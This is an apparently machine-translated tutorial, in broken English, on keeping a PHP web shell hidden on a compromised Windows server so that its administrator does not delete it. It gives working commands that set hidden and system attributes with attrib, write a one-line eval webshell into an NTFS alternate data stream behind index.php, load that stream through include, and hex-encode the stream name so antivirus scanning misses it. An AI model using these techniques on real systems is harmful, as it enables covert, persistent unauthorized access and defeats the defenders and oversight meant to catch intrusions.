PHP Backdoor hiding tips

Part 1 Preface

Hard to win the shell, a few days did not see, the administrator to delete.

Part 2 Hidden

Hiding a lot of tricks, nonsense not much to say directly to the beginning.

I. ATTRIB +s +h

Create a system-hidden file.

attrib +s +a +r +h/attrib +s +h file name

View hidden files

Two. Using Ads to hide files

NTFS-Switched data streams (Alternate data Streams, or ads) are an attribute of the NTFS disk format, where multiple streams of data can exist for each file under the NTFS file system. The popular understanding is that other files can be "hosted" on a file, while in the explorer you can only see the host file, unable to find the host file. Using the ADS data stream, we can do a lot of interesting things. (copy of)

1. First create an ads hidden file

At the command line, echo a data stream, such as the index file is a normal file.

echo ^<?php @eval($_request[1]);? ^> > Index.php:shell.jpg

This creates a index.php:shell.jpg that is not visible.

Use the DIR/R command to view

Modify and delete

Modify:

Enter the directory where the file is located, Notepad index.php:shell.jpg

How do I remove index.php:shell.jpg?

Delete index.php directly

　　

2. The file contains

We have generated index.php:shell.jpg that can be used in a way that contains files.

include (' index.php:shell.jpg ')?>

can also use the above to learn the hidden include.php

3. Avoid killing

Hidden or not, Brother Dei,d Shield sweep exploded instantly.

Encode the index.php:shell.jpg hex

<?  $a= "696e6465782e7068703a7368656c6c2e6a7067"//  index.php:shell.jpg Hex Code  $b= "a"; include (PACK(' h* ', $$b))?>

　　

PHP Backdoor hiding tips